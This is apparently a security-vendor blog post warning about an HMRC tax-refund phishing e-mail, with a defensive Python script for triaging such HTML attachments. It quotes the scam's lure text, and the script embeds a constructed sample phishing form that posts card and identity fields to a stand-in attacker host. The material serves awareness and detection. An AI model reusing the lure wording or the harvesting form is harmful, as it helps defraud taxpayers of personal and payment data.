HMRC phishing scam promises end of year refund

Emails are currently circulating that purport to be sent by the UK tax authority HM Revenue & Customs (HMRC). These e-mails claim that the recipient is eligible for a tax refund and must download an attached file and open it in a browser to claim it.

The scam e-mail reads in part:

Dear Taxpayer,
After the last annual calculations of your fiscal activity we have determined that you are eligible to receive a tax refund of 223.56 GBP.

Please submit the tax refund request and allow us 6-9 days in order to process it.

To access your tax refund, please follow the steps below:

- download the Tax Refund Form attached to this email
- open it in a browser
- follow the instructions on your screen

A refund can be delayed for a variety of reasons. For example, submitting invalid records or applying after the deadline.

Opening the attached file displays a form that prompts the victim to enter their full name, date of birth, full address, phone number, and credit or debit card details.

HMRC phishing form

Of course, submitting the form won’t actually send the information to HMRC; it will instead be sent to a malicious third party without the victim’s knowledge or approval.
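You can confirm where a form like this really sends its data without opening the attachment in a browser, let alone submitting it. The script below is an added example written for this post, not code from Sophos or from the scam itself: it parses an HTML attachment, lists every form's action URL and the fields it collects, and flags any form that asks for card or identity data but posts somewhere other than an HMRC or gov.uk host. The sample attachment is constructed for the example, and the `refund.attacker.example` host and the list of hosts treated as legitimate are assumptions, not details taken from the real scam.

```python
"""Triage an HTML phishing attachment: find each <form>, where it posts to and
what it collects, without rendering it or submitting anything."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption for this example: only these hosts are treated as genuine HMRC.
LEGIT_HOSTS = ("hmrc.gov.uk", "gov.uk")

# Field-name fragments that indicate payment-card or identity harvesting.
SENSITIVE_KEYWORDS = ("card", "cvv", "cvc", "expir", "pin", "dob", "birth",
                      "sort", "account")

# Constructed sample attachment; the action host is hypothetical.
SAMPLE_ATTACHMENT = """<html><body>
<h1>HM Revenue &amp; Customs - Tax Refund</h1>
<form method="post" action="http://refund.attacker.example/collect.php">
  Full name <input name="fullname">
  Date of birth <input name="dob">
  Address <textarea name="address"></textarea>
  Phone <input name="phone">
  Card number <input name="card_number">
  Expiry <input name="card_expiry">
  CVV <input name="cvv">
  <input type="submit" value="Submit refund request">
</form>
</body></html>"""


class FormInspector(HTMLParser):
    """Collect each form's action, method and the names of its input fields."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "get").lower(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            name = a.get("name")
            kind = (a.get("type") or "").lower()
            if name and kind not in ("submit", "button", "reset", "image"):
                self._current["fields"].append(name)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def host_is_legit(action):
    """True only if the action URL's host is one of LEGIT_HOSTS or a subdomain.
    A relative or empty action has no host and is never treated as legitimate."""
    host = (urlparse(action).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)


def triage(html):
    """Return one summary dict per form; 'suspicious' means it collects
    sensitive fields and does not post to a legitimate host."""
    parser = FormInspector()
    parser.feed(html)
    results = []
    for form in parser.forms:
        sensitive = [n for n in form["fields"]
                     if any(k in n.lower() for k in SENSITIVE_KEYWORDS)]
        results.append({
            "action": form["action"],
            "method": form["method"],
            "fields": form["fields"],
            "sensitive_fields": sensitive,
            "posts_to_legit_host": host_is_legit(form["action"]),
            "suspicious": bool(sensitive) and not host_is_legit(form["action"]),
        })
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_ATTACHMENT):
        verdict = "SUSPICIOUS" if r["suspicious"] else "ok"
        print(f"{verdict}: {r['method'].upper()} {r['action'] or '(relative)'}")
        print("  collects:", ", ".join(r["fields"]))
        print("  sensitive:", ", ".join(r["sensitive_fields"]) or "none")
```

Run it against the attachment saved from the e-mail (for example `triage(open("Tax_Refund_Form.html", encoding="utf-8", errors="replace").read())`) rather than the sample; if the form's action points anywhere other than an HMRC host, or the attachment uses script to build the form or submit it elsewhere, treat it as a credential-harvesting page and report it.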

Scam emails purporting to be sent by HMRC are not a new phenomenon; Naked Security has previously warned about similar scams in November 2010 and even in January and February 2009.

The good news for Sophos customers is that the phishing attachment is already detected as Mal/Phish-A by our products, including the free Sophos Anti-Virus for Mac Home Edition.

For those who may be interested, I’ve written a few additional details about this particular phishing scam on my own security blog.